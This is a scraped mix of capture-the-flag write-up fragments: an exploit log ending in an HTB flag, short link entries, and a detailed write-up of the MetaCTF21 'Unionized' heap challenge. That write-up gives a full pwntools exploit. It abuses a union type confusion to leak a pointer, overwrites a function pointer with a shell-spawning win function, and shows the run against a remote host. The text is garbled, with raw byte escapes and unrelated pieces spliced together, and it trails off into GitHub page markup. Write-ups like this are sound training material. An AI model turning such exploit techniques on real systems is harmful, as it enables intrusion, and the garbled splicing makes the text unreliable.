\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\n\n>'b' \nName:'b' Arachnoid Index: 0\n\n\n \xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 1. Craft arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 2. Delete arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 3. View arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 4. Obtain arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 5. Exit \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\n\n>'b' Index:'b' Arachnoid 0:\n\nName: hello\n\nCode: bad\n\n \xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 1. Craft arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 2. Delete arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 3. View arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 4. Obtain arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 5. Exit \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\n\n>'b' Arachnoid 0:\nName: \nCode: \x80\x82\xe1\xac\x04V\n\n \xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 1. Craft arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 2. Delete arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 3. View arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 4. Obtain arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 5. Exit \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\n\n>'b' \nName:'b' Arachnoid Index: 1\n\n\n \xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 1. Craft arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 2. Delete arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 3. View arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 4. Obtain arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 5. Exit \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\n\n>'b' Arachnoid 0:\nName: bad\nCode: sp1d3y\n\nArachnoid 1:\nName: sp1d3y\n\nCode: bad\n\n \xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 1. Craft arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 2. Delete arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 3. View arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 4. Obtain arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 5. Exit \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\n\n>'b' Arachnoid:'[*] Switching to interactive mode HTB{l3t_th3_4r4chn01ds_fr3333}
?????????????? ? ? ? 1. Craft arachnoid ? ? 2. Delete arachnoid ? ? 3. View arachnoid ? ? 4. Obtain arachnoid ? ? 5. Exit ? ? ? ??????????????
> $ ```Thanks for reading! |
Given cipher text and public key used to encrypt it. The modulus was very large while the exponent was very small (3). Cube root the cipher text to find the flag. Full write up [here](https://github.com/jontay999/CTF-writeups/tree/master/HackTheBox/CyberSanta/Crypto/missing_reindeer) |
[Original writeup](https://github.com/acdwas/ctf/tree/master/2021/Cyber%20Santa%20is%20Coming%20to%20Town/rev/upgraded) https://github.com/acdwas/ctf/tree/master/2021/Cyber%20Santa%20is%20Coming%20to%20Town/rev/upgraded |
# Unionized
The description for this challenge is as follows:
*Why didn't anyone tell me about the magic of Unionized when I first started programming? I would have saved so much memory with these nifty things, don't you think? Here try my application and tell me what you think host.cg21.metaproblems.com:3150*
This challenge was worth 275 points, and it was solved by 27 teams. The downloadables for the challenge included the original binary with docker information as well as the C source code. I didn't start looking at this challenge until fairly later in the CTF, so I ended up solving it on my own after the competition window ended. It was reasonably straightforward once the vulnerability was identified and an appropriate debugging environment was set up.
**TL;DR Solution:** Realize that storing the pointers to strings in the same spot as ints, long longs, and chars is a bad idea. If you define a string, edit it to one of the latter data types, edit the string pointer as one of those data types, then edit the index back to being a smaller string. Any attempts to write to or read from that index will look at whetever address is pointed to by your edited string pointer, which gives you an arbitrary read/write. Find the print function pointer in the heap, read from it for a PIE leak, then write the win function to that section of memory and get a shell.
## Original Writeup Link
This writeup is also available on my GitHub! View it there via this link: https://github.com/knittingirl/CTF-Writeups/tree/main/pwn_challs/MetaCTF21/Unionized
## Environment Setup
Because of the heap offsets used in this challenge, it was very helpful to use the same libc as the remote instance. The challenge does include Docker information, so you could run the challenge within a docker instance, but I personally prefer to run things on my actual machine, and I wanted to quickly share my methodology for this if anyone feels similarly.
Firstly, I open up the Dockerfile. The top line is "FROM debian:buster-20200803", so this is image that is being used. I pull the image, then save it to a tar archive for easy export of files:```knittingirl@piglet:~/CTF/metaCTF21/unionized$ sudo docker pull debian:buster-20200803[sudo] password for knittingirl: buster-20200803: Pulling from library/debiand6ff36c9ec48: Pull complete Digest: sha256:1e74c92df240634a39d050a5e23fb18f45df30846bb222f543414da180b47a5dStatus: Downloaded newer image for debian:buster-20200803docker.io/library/debian:buster-20200803knittingirl@piglet:~/CTF/metaCTF21/unionized$ sudo docker images[sudo] password for knittingirl: REPOSITORY TAG IMAGE ID CREATED SIZEdebian buster-20200803 ee11c54e6bb7 16 months ago 114MBknittingirl@piglet:~/CTF/metaCTF21/unionized$ sudo docker save ee11c54e6bb7 > buster_files.tar```Then within a file explorer, I go into the back-up, the only layer, and the layer.tar file to reach the base directory of the file system. The libc and interpreter files are in /libx86_64-linux-gnu/, and they are named libc-2.28.so and ld-2.28.so respectively. Then I just copy them to the directory where my unionized binary is, make sure that they each have executable permissions, then use patchelf to set the path to my interpreter in a copy of the binary. See commands below:```knittingirl@piglet:~/CTF/metaCTF21/unionized$ cp chall chall_patchedknittingirl@piglet:~/CTF/metaCTF21/unionized$ patchelf chall_patched --set-interpreter ld-2.28.so --set-rpath ./```Then I just set the LD_PRELOAD environment variable to use the libc-2.28.so file as the libc with that patched binary. The format in pwntools to use that environment variable is:```from pwn import *
target = process('./chall_patched', env={"LD_PRELOAD":"./libc-2.28.so"})```I hope that this makes sense and is helpful if you've been struggling with docker environments and pwn challenges.
## Gathering Information
So, the first step, as always, is to simply run the binary and see what happens. This shows me that I can create objects of various types, after creation, I can edit those objects as the same or different type, I can display object contents, and despite the appearance of the menu, I can't actually delete anything.```knittingirl@piglet:~/CTF/metaCTF21/unionized$ ./challWhat would you like to do?1. Create new object2. Display objects3. Edit Object4. Delete Object5. Exit1What type would you like?
1. String2. Integer3. Long Long4. Character1What size would you like your string to be45What is your dataaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaWhat would you like to do?1. Create new object2. Display objects3. Edit Object4. Delete Object5. Exit2aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
What would you like to do?1. Create new object2. Display objects3. Edit Object4. Delete Object5. Exit3What index would you like to modify?0What type would you like?
1. String2. Integer3. Long Long4. Character2What is your value:87Variable createdWhat would you like to do?1. Create new object2. Display objects3. Edit Object4. Delete Object5. Exit287What would you like to do?1. Create new object2. Display objects3. Edit Object4. Delete Object5. Exit4Not implementedWhat would you like to do?1. Create new object2. Display objects3. Edit Object4. Delete Object5. Exit```If I run checksec on the binary, I can see that PIE is enabled, as is NX:```knittingirl@piglet:~/CTF/metaCTF21/unionized$ checksec chall[*] '/home/knittingirl/CTF/metaCTF21/unionized/chall' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled```At this point, I am ready to start reverse engineering using the generously provided C-source code. The created struct stands out immediately. It contains a union with all of the types we can use, which should be relevant based on the challenge name. It also includes a function pointer, which tends to be a target in heap-based challenges since these pointers present an easy location to overwrite.```struct created{ int type; int size;
union Variable { char * string; int integer; long long long_boi; char character;
} variable; void (*print)(); struct created *next;};```Another obvious point of interest is the win() function. I will also note that the delete() function genuinely just does nothing aside from a puts.```void win(){ system("/bin/sh");}
void delete(){ puts("Not implemented"); return;}```The main exploit is a little bit harder to spot. The create_variable() function is called by both the create() and edit() functions in order to select an input type and input contents. If I look at the case for string types, it checks if the currently requested string length exceeds that of any length entered previously for this specific object at this index. If it does, it will make a fresh, appropriately sized malloc, and the variable section of the struct will be overwritten with the pointer to that mallocced section. However, if the requested length is shorter, no fresh allocation will be made, and the string will be allocated to whatever the variable pointer is pointing to. ```case 1: while(1){ printf("What size would you like your string to be\n"); scanf("%d", &size); if(tmp->size < size) { tmp->variable.string = malloc(size); tmp->size = size; } if(!tmp->variable.string){ printf("Allocation failed Try again\n"); sleep(1); continue; } break; } printf("What is your data\n"); read(0, tmp->variable.string, tmp->size); tmp->type = 1; tmp->print = display_string; break;```Since variable is a union that can be switched to various types, this is a very severe problem. For example, if I make object 0 a string of length 55, then I make it an int whose value is 0x5565, then try to make object 0 a string again, this time with length 35, it will not allocate a new spot on the heap for my heap contents. Instead, it will try to write to the address of 0x5565; if that is not allocated memory, then we can expect a segfault. Here is that sequence of events in practice:```knittingirl@piglet:~/CTF/metaCTF21/unionized$ ./challWhat would you like to do?1. Create new object2. Display objects3. Edit Object4. Delete Object5. Exit1What type would you like?
1. String2. Integer3. Long Long4. Character1What size would you like your string to be55What is your dataaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaWhat would you like to do?1. Create new object2. Display objects3. Edit Object4. Delete Object5. Exit3What index would you like to modify?0What type would you like?
1. String2. Integer3. Long Long4. Character2What is your value:21861Variable createdWhat would you like to do?1. Create new object2. Display objects3. Edit Object4. Delete Object5. Exit3What index would you like to modify?0What type would you like?
1. String2. Integer3. Long Long4. Character1What size would you like your string to be35What is your databbbbbbbbbbbbbbbbbbbbbbVariable createdWhat would you like to do?1. Create new object2. Display objects3. Edit Object4. Delete Object5. Exit2Segmentation fault```## Planning the Exploit:
This exploit presents a fairly obvious opportunity for an arbitrary write; however, the presence of PIE as a defense means that I cannot, for instance, simply overwrite a GOT entry with my win function, because I do not know where the GOT is. As a result, I decided to look into a partial-overwrite strategy. If I edit strings to chars and back again, that should only overwrite the least-significant bit in my pointer. If I break on the create_variable function in GDB/GEF, as called from an edit, I can see that, if I am not overwriting anything, the string is read into a heap location as expected. In one specific instance, it is getting read into the address 0x000055e909e09290. If I then look at all the addresses with the same seven most significant bytes, i.e. ones I could write to instead by overwriting the least significant byte with a char, I see that the address for the print function pointer from the struct definition, where the address for display_string is stored in this case, is kept at 0x55e909e09270.```read@plt ( $rdi = 0x0000000000000000, $rsi = 0x000055e909e09290 → "00000000000000000000", $rdx = 0x0000000000000014)...gef➤ x/40gx 0x000055e909e092000x55e909e09200: 0x0000000000000000 0x00000000000000000x55e909e09210: 0x0000000000000000 0x00000000000000000x55e909e09220: 0x0000000000000000 0x00000000000000000x55e909e09230: 0x0000000000000000 0x00000000000000000x55e909e09240: 0x0000000000000000 0x00000000000000000x55e909e09250: 0x0000000000000000 0x00000000000000310x55e909e09260: 0x0000001400000001 0x000055e909e092900x55e909e09270: 0x000055e909de7226 0x00000000000000000x55e909e09280: 0x0000000000000000 0x00000000000000210x55e909e09290: 0x3030303030303030 0x30303030303030300x55e909e092a0: 0x0000000030303030 0x0000000000020d610x55e909e092b0: 0x0000000000000000 0x00000000000000000x55e909e092c0: 0x0000000000000000 0x00000000000000000x55e909e092d0: 0x0000000000000000 0x00000000000000000x55e909e092e0: 0x0000000000000000 0x00000000000000000x55e909e092f0: 0x0000000000000000 0x00000000000000000x55e909e09300: 0x0000000000000000 0x00000000000000000x55e909e09310: 0x0000000000000000 0x00000000000000000x55e909e09320: 0x0000000000000000 0x00000000000000000x55e909e09330: 0x0000000000000000 0x0000000000000000gef➤ x/i 0x000055e909de7226 0x55e909de7226 <display_string>: push rbp```If I also look at the display function, I can see that the display_string function is called because it is the function pointed to at this heap address; the contents of rax+10 are that heap address, those contents are loaded into rdx, and rdx is called.``` → 0x55e909de7653 <display+32> mov rdx, QWORD PTR [rax+0x10] 0x55e909de7657 <display+36> mov rax, QWORD PTR [rbp-0x8] 0x55e909de765b <display+40> mov rdi, rax 0x55e909de765e <display+43> mov eax, 0x0 0x55e909de7663 <display+48> call rdx 0x55e909de7665 <display+50> add DWORD PTR [rbp-0xc], 0x1─────────────────────────────────────────────────────────────────── threads ────[#0] Id 1, Name: "chall_patched", stopped 0x55e909de7653 in display (), reason: SINGLE STEP───────────────────────────────────────────────────────────────────── trace ────[#0] 0x55e909de7653 → display()[#1] 0x55e909de7769 → main()────────────────────────────────────────────────────────────────────────────────gef➤ x/gx $rax+0x100x55e909e09270: 0x000055e909de7226gef➤ x/i win 0x55e909de7680 <win>: push rbp```Here is the script so far to get these outputs:```from pwn import *
target = process('./chall_patched', env={"LD_PRELOAD":"./libc-2.28.so"})
pid = gdb.attach(target, "b *display+32\nb *create_variable+314\n set disassembly-flavor intel\ncontinue")
#target = remote('host.cg21.metaproblems.com', 3150)
elf = ELF('chall')
def create_string(length, content):
print(target.recvuntil(b'5. Exit')) target.sendline(b'1') print(target.recvuntil(b'What type would you like?')) target.sendline(b'1') print(target.recvuntil(b'like your string to be')) target.sendline(str(length)) print(target.recvuntil(b'data')) target.sendline(content)
def edit_char(index, character): print(target.recvuntil(b'5. Exit')) target.sendline(b'3') print(target.recvuntil(b'What index would you like to modify')) target.sendline(str(index)) print(target.recvuntil(b'What type would you like?')) target.sendline(b'4') print(target.recvuntil(b'What is your value:')) target.sendline(character)
def edit_string(index, length, data): print(target.recvuntil(b'5. Exit')) target.sendline(b'3')
print(target.recvuntil(b'What index would you like to modify')) target.sendline(str(index))
print(target.recvuntil(b'What type would you like?')) target.sendline(b'1')
print(target.recvuntil(b'like your string to be')) target.sendline(str(length))
print(target.recvuntil(b'data')) target.sendline(data)
def display(): print(target.recvuntil(b'5. Exit\n')) target.sendline(b'2')
create_string(20, '0' * 20)edit_string(0, 15, b'a' * 15)
display()
target.interactive()```At this point, I have two options for my approach. I could attempt a partial overwrite of the print function pointer with the win function; however, the low two bytes of the functions differ, and only the low three nibbles of win will be known between executions, so I will have to guess one nibble for 1/16 odds of success. This is not bad, and if I did not have an alternative idea, I would have implemented this.
However, I realized that in addition to an arbitrary write, I should be able to get an arbitrary read. I can simply use the string to char to string method to input a string of length zero to the heap offset that contains the display_string address, then use the display option to read that unedited address. I use this to get a PIE leak and find the win function's address, and from there, I can write the win function to the print pointer, overwriting the display_string address.
# Writing the Exploit
One final note of housekeeping is that if you want to overwrite the print address, you do need to create a second string to char to string object and use that to overwrite the display_string address of the first object. This is becausse the display_string address is written to the print pointer after I write in the contents of my string, so if I try to overwrite the print pointer of the object I am currently editing, my efforts will be overwritten and nothing will happen. I have since realized that since there is only partial RELRO, I should also be able to just overwrite a GOT function like puts with my win function and also get a shell now that I have a PIE leak.
Here is my finished script:```from pwn import *
#target = process('./chall_patched', env={"LD_PRELOAD":"./libc-2.28.so"})
#pid = gdb.attach(target, "b *display+32\nb *create_variable+314\n set disassembly-flavor intel\ncontinue")
target = remote('host.cg21.metaproblems.com', 3150)
elf = ELF('chall')
def create_string(length, content):
print(target.recvuntil(b'5. Exit')) target.sendline(b'1') print(target.recvuntil(b'What type would you like?')) target.sendline(b'1') print(target.recvuntil(b'like your string to be')) target.sendline(str(length)) print(target.recvuntil(b'data')) target.sendline(content)
def edit_char(index, character): print(target.recvuntil(b'5. Exit')) target.sendline(b'3') print(target.recvuntil(b'What index would you like to modify')) target.sendline(str(index)) print(target.recvuntil(b'What type would you like?')) target.sendline(b'4') print(target.recvuntil(b'What is your value:')) target.sendline(character)
def edit_string(index, length, data): print(target.recvuntil(b'5. Exit')) target.sendline(b'3')
print(target.recvuntil(b'What index would you like to modify')) target.sendline(str(index))
print(target.recvuntil(b'What type would you like?')) target.sendline(b'1')
print(target.recvuntil(b'like your string to be')) target.sendline(str(length))
print(target.recvuntil(b'data')) target.sendline(data)
def display(): print(target.recvuntil(b'5. Exit\n')) target.sendline(b'2')
create_string(20, '0' * 20)create_string(20, '1' * 20)
edit_char(0, b'\x70')edit_string(0, 0, b'')
display()
leak = target.recv(6)print(leak)display_string = u64(leak + b'\x00' * 2)print(hex(display_string))
pie_base = display_string - elf.symbols['display_string']win = pie_base + elf.symbols['win']print(hex(win))
#Round 2:
edit_char(1, b'\x70')
edit_string(1, 8, p64(win))
display()
target.interactive()```And here are the results:```knittingirl@piglet:~/CTF/metaCTF21/unionized$ python3 unionized_writeup.py [+] Opening connection to host.cg21.metaproblems.com on port 3150: Done[*] '/home/knittingirl/CTF/metaCTF21/unionized/chall' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: PIE enabledb'What would you like to do?\n1. Create new object\n2. Display objects\n3. Edit Object\n4. Delete Object\n5. Exit'b'\nWhat type would you like?'b'\n\n1. String\n2. Integer\n3. Long Long\n4. Character\nWhat size would you like your string to be'b'\nWhat is your data'b'\nWhat would you like to do?\n1. Create new object\n2. Display objects\n3. Edit Object\n4. Delete Object\n5. Exit'b'\nWhat type would you like?'b'\n\n1. String\n2. Integer\n3. Long Long\n4. Character\nWhat size would you like your string to be'b'\nWhat is your data'b'\nWhat would you like to do?\n1. Create new object\n2. Display objects\n3. Edit Object\n4. Delete Object\n5. Exit'b'\nWhat index would you like to modify'b'?\nWhat type would you like?'b'\n\n1. String\n2. Integer\n3. Long Long\n4. Character\nWhat is your value:'b'\nVariable created\nWhat would you like to do?\n1. Create new object\n2. Display objects\n3. Edit Object\n4. Delete Object\n5. Exit'b'\nWhat index would you like to modify'b'?\nWhat type would you like?'b'\n\n1. String\n2. Integer\n3. Long Long\n4. Character\nWhat size would you like your string to be'b'\nWhat is your data'b'\nVariable created\nWhat would you like to do?\n1. Create new object\n2. Display objects\n3. Edit Object\n4. Delete Object\n5. Exit\n'b'&r2\x9b$V'0x56249b3272260x56249b327680b'\n11111111111111111111\nWhat would you like to do?\n1. Create new object\n2. Display objects\n3. Edit Object\n4. Delete Object\n5. Exit'b'\nWhat index would you like to modify'b'?\nWhat type would you like?'b'\n\n1. String\n2. Integer\n3. Long Long\n4. Character\nWhat is your value:'b'\nVariable created\nWhat would you like to do?\n1. Create new object\n2. Display objects\n3. Edit Object\n4. Delete Object\n5. Exit'b'\nWhat index would you like to modify'b'?\nWhat type would you like?'b'\n\n1. String\n2. Integer\n3. Long Long\n4. Character\nWhat size would you like your string to be'b'\nWhat is your data'b'\nVariable created\nWhat would you like to do?\n1. Create new object\n2. Display objects\n3. Edit Object\n4. Delete Object\n5. Exit\n'[*] Switching to interactive mode$ lschallchall.shflag.txt$ cat flag.txtMetaCTF{Unions_Can_Be_Problematic}```Thanks for reading! |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<meta name="optimizely-datafile" content="{"groups": [], "environmentKey": "production", "rollouts": [], "typedAudiences": [], "projectId": "16737760170", "variables": [], "featureFlags": [], "experiments": [], "version": "4", "audiences": [{"conditions": "[\"or\", {\"match\": \"exact\", \"name\": \"$opt_dummy_attribute\", \"type\": \"custom_attribute\", \"value\": \"$opt_dummy_value\"}]", "id": "$opt_dummy_audience", "name": "Optimizely-Generated Audience for Backwards Compatibility"}], "anonymizeIP": true, "sdkKey": "WTc6awnGuYDdG98CYRban", "attributes": [{"id": "16822470375", "key": "user_id"}, {"id": "17143601254", "key": "spammy"}, {"id": "18175660309", "key": "organization_plan"}, {"id": "18813001570", "key": "is_logged_in"}, {"id": "19073851829", "key": "geo"}, {"id": "20175462351", "key": "requestedCurrency"}, {"id": "20785470195", "key": "country_code"}, {"id": "21656311196", "key": "opened_downgrade_dialog"}], "botFiltering": false, "accountId": "16737760170", "events": [{"experimentIds": [], "id": "17911811441", "key": "hydro_click.dashboard.teacher_toolbox_cta"}, {"experimentIds": [], "id": "18124116703", "key": "submit.organizations.complete_sign_up"}, {"experimentIds": [], "id": "18145892387", "key": "no_metric.tracked_outside_of_optimizely"}, {"experimentIds": [], "id": "18178755568", "key": "click.org_onboarding_checklist.add_repo"}, {"experimentIds": [], "id": "18180553241", "key": "submit.repository_imports.create"}, {"experimentIds": [], "id": "18186103728", "key": "click.help.learn_more_about_repository_creation"}, {"experimentIds": [], "id": "18188530140", "key": "test_event"}, {"experimentIds": [], "id": "18191963644", "key": "click.empty_org_repo_cta.transfer_repository"}, {"experimentIds": [], "id": "18195612788", "key": "click.empty_org_repo_cta.import_repository"}, {"experimentIds": [], "id": "18210945499", "key": "click.org_onboarding_checklist.invite_members"}, {"experimentIds": [], "id": "18211063248", "key": "click.empty_org_repo_cta.create_repository"}, {"experimentIds": [], "id": "18215721889", "key": "click.org_onboarding_checklist.update_profile"}, {"experimentIds": [], "id": "18224360785", "key": "click.org_onboarding_checklist.dismiss"}, {"experimentIds": [], "id": "18234832286", "key": "submit.organization_activation.complete"}, {"experimentIds": [], "id": "18252392383", "key": "submit.org_repository.create"}, {"experimentIds": [], "id": "18257551537", "key": "submit.org_member_invitation.create"}, {"experimentIds": [], "id": "18259522260", "key": "submit.organization_profile.update"}, {"experimentIds": [], "id": "18564603625", "key": "view.classroom_select_organization"}, {"experimentIds": [], "id": "18568612016", "key": "click.classroom_sign_in_click"}, {"experimentIds": [], "id": "18572592540", "key": "view.classroom_name"}, {"experimentIds": [], "id": "18574203855", "key": "click.classroom_create_organization"}, {"experimentIds": [], "id": "18582053415", "key": "click.classroom_select_organization"}, {"experimentIds": [], "id": "18589463420", "key": "click.classroom_create_classroom"}, {"experimentIds": [], "id": "18591323364", "key": "click.classroom_create_first_classroom"}, {"experimentIds": [], "id": "18591652321", "key": "click.classroom_grant_access"}, {"experimentIds": [], "id": "18607131425", "key": "view.classroom_creation"}, {"experimentIds": [], "id": "18831680583", "key": "upgrade_account_plan"}, {"experimentIds": [], "id": "19064064515", "key": "click.signup"}, {"experimentIds": [], "id": "19075373687", "key": "click.view_account_billing_page"}, {"experimentIds": [], "id": "19077355841", "key": "click.dismiss_signup_prompt"}, {"experimentIds": [], "id": "19079713938", "key": "click.contact_sales"}, {"experimentIds": [], "id": "19120963070", "key": "click.compare_account_plans"}, {"experimentIds": [], "id": "19151690317", "key": "click.upgrade_account_cta"}, {"experimentIds": [], "id": "19424193129", "key": "click.open_account_switcher"}, {"experimentIds": [], "id": "19520330825", "key": "click.visit_account_profile"}, {"experimentIds": [], "id": "19540970635", "key": "click.switch_account_context"}, {"experimentIds": [], "id": "19730198868", "key": "submit.homepage_signup"}, {"experimentIds": [], "id": "19820830627", "key": 